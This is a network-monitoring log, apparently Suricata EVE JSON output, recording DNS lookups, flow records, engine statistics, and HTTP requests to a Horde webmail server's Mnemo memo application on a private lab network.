{"timestamp":"2020-02-29T00:18:06.824223+0000","flow_id":2079140748366751,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33356,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61183,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:06.932681+0000","flow_id":2079140748366751,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33356,"proto":"UDP","dns":{"type":"answer","id":61183,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:06.932681+0000","flow_id":2079140748366751,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33356,"proto":"UDP","dns":{"type":"answer","id":61183,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:06.951877+0000","flow_id":588464974095740,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:18:06.951877+0000","flow_id":588464974095740,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":15,"tx_id":0}} {"timestamp":"2020-02-29T00:18:07.000351+0000","event_type":"stats","stats":{"uptime":14739,"capture":{"kernel_packets":136428,"kernel_drops":0},"decoder":{"pkts":136435,"bytes":93767765,"invalid":192,"ipv4":134904,"ipv6":10,"ethernet":136435,"raw":0,"null":0,"sll":0,"tcp":129487,"udp":5210,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093600},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2806,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2822,"synack":2813,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1843,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2384,"failed_udp":112},"tx":{"http":4710,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2464}},"flow_mgr":{"closed_pruned":2791,"new_pruned":17,"est_pruned":2440,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19509,"memcap_state":0,"memcap_global":0},"http":{"memuse":161241,"memcap":0}}} {"timestamp":"2020-02-29T00:18:07.317763+0000","flow_id":362352125925699,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34535,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":29394,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:07.426181+0000","flow_id":362352125925699,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34535,"proto":"UDP","dns":{"type":"answer","id":29394,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:07.426181+0000","flow_id":362352125925699,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34535,"proto":"UDP","dns":{"type":"answer","id":29394,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:07.516716+0000","flow_id":2124693171580563,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34870,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5606}} {"timestamp":"2020-02-29T00:18:08.001099+0000","flow_id":1204526473524166,"event_type":"flow","src_ip":"192.168.10.122","src_port":46995,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:13:07.308166+0000","end":"2020-02-29T00:13:07.416966+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:08.631175+0000","flow_id":2196762722510294,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34868,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7319},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":35058,"tx_id":0}} {"timestamp":"2020-02-29T00:18:10.771454+0000","flow_id":1370887756629374,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50796,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":8098,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:10.880127+0000","flow_id":1370887756629374,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50796,"proto":"UDP","dns":{"type":"answer","id":8098,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:10.880127+0000","flow_id":1370887756629374,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50796,"proto":"UDP","dns":{"type":"answer","id":8098,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:10.964330+0000","flow_id":1132834899264066,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34872,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4935}} {"timestamp":"2020-02-29T00:18:11.000525+0000","flow_id":1491443173997920,"event_type":"flow","src_ip":"192.168.10.122","src_port":42597,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:13:10.769376+0000","end":"2020-02-29T00:13:10.877835+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:11.000727+0000","flow_id":1108070098154454,"event_type":"flow","src_ip":"192.168.10.122","src_port":53042,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:13:10.603094+0000","end":"2020-02-29T00:13:10.711700+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:11.000795+0000","flow_id":969226690410159,"event_type":"flow","src_ip":"192.168.10.122","src_port":37907,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:13:10.177839+0000","end":"2020-02-29T00:13:10.286032+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:11.152034+0000","flow_id":1665067602402,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37306,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":25116,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:11.146917+0000","flow_id":588464974095740,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52772,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:18:11.260439+0000","flow_id":1665067602402,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37306,"proto":"UDP","dns":{"type":"answer","id":25116,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:11.260439+0000","flow_id":1665067602402,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37306,"proto":"UDP","dns":{"type":"answer","id":25116,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:11.388183+0000","flow_id":588464974095740,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:18:11.388183+0000","flow_id":588464974095740,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":208,"tx_id":1}} {"timestamp":"2020-02-29T00:18:11.398435+0000","flow_id":807637155517539,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41542,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61759,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:11.506897+0000","flow_id":807637155517539,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41542,"proto":"UDP","dns":{"type":"answer","id":61759,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:11.506897+0000","flow_id":807637155517539,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41542,"proto":"UDP","dns":{"type":"answer","id":61759,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:11.621320+0000","flow_id":588464974095740,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5780}} {"timestamp":"2020-02-29T00:18:12.004506+0000","flow_id":682082356943433,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"159.203.8.72","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:13:11.449097+0000","end":"2020-02-29T00:13:11.561870+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:12.519018+0000","flow_id":2124693171580563,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34870,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5606},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":20704,"tx_id":0}} {"timestamp":"2020-02-29T00:18:13.000312+0000","flow_id":1019705441143674,"event_type":"flow","src_ip":"192.168.10.122","src_port":44779,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:13:12.019322+0000","end":"2020-02-29T00:13:12.127791+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:14.000266+0000","event_type":"stats","stats":{"uptime":14746,"capture":{"kernel_packets":136484,"kernel_drops":0},"decoder":{"pkts":136500,"bytes":93793921,"invalid":192,"ipv4":134969,"ipv6":10,"ethernet":136500,"raw":0,"null":0,"sll":0,"tcp":129542,"udp":5220,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093600},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2809,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2825,"synack":2816,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1846,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2389,"failed_udp":112},"tx":{"http":4715,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2469}},"flow_mgr":{"closed_pruned":2791,"new_pruned":17,"est_pruned":2445,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":3,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65529,"rows_empty":3,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19179,"memcap_state":0,"memcap_global":0},"http":{"memuse":140340,"memcap":0}}} {"timestamp":"2020-02-29T00:18:15.965065+0000","flow_id":1132834899264066,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34872,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4935},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":21692,"tx_id":0}} {"timestamp":"2020-02-29T00:18:16.581122+0000","flow_id":588464974095740,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52772,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5780},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":31043,"tx_id":2}} {"timestamp":"2020-02-29T00:18:17.555596+0000","flow_id":706061179386444,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":55199,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":15870,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:17.664296+0000","flow_id":706061179386444,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55199,"proto":"UDP","dns":{"type":"answer","id":15870,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:17.664296+0000","flow_id":706061179386444,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":55199,"proto":"UDP","dns":{"type":"answer","id":15870,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:17.680210+0000","flow_id":1633039675901026,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34874,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:18:17.680210+0000","flow_id":1633039675901026,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34874,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":16,"tx_id":0}} {"timestamp":"2020-02-29T00:18:19.000354+0000","flow_id":36278189856155,"event_type":"flow","src_ip":"192.168.10.122","src_port":46056,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:13:18.890267+0000","end":"2020-02-29T00:13:18.998610+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:21.000202+0000","event_type":"stats","stats":{"uptime":14753,"capture":{"kernel_packets":136513,"kernel_drops":0},"decoder":{"pkts":136519,"bytes":93796452,"invalid":192,"ipv4":134988,"ipv6":10,"ethernet":136519,"raw":0,"null":0,"sll":0,"tcp":129559,"udp":5222,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093888},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2810,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2826,"synack":2817,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1847,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2390,"failed_udp":112},"tx":{"http":4716,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2470}},"flow_mgr":{"closed_pruned":2791,"new_pruned":17,"est_pruned":2446,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":4,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65532,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19180,"memcap_state":0,"memcap_global":0},"http":{"memuse":41096,"memcap":0}}} {"timestamp":"2020-02-29T00:18:22.059601+0000","flow_id":1633039675901026,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34874,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:18:22.074132+0000","flow_id":574334532723092,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36137,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":46811,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:22.182286+0000","flow_id":574334532723092,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36137,"proto":"UDP","dns":{"type":"answer","id":46811,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:22.182286+0000","flow_id":574334532723092,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36137,"proto":"UDP","dns":{"type":"answer","id":46811,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:22.245963+0000","flow_id":1633039675901026,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34874,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:18:22.245963+0000","flow_id":1633039675901026,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34874,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":215,"tx_id":1}} 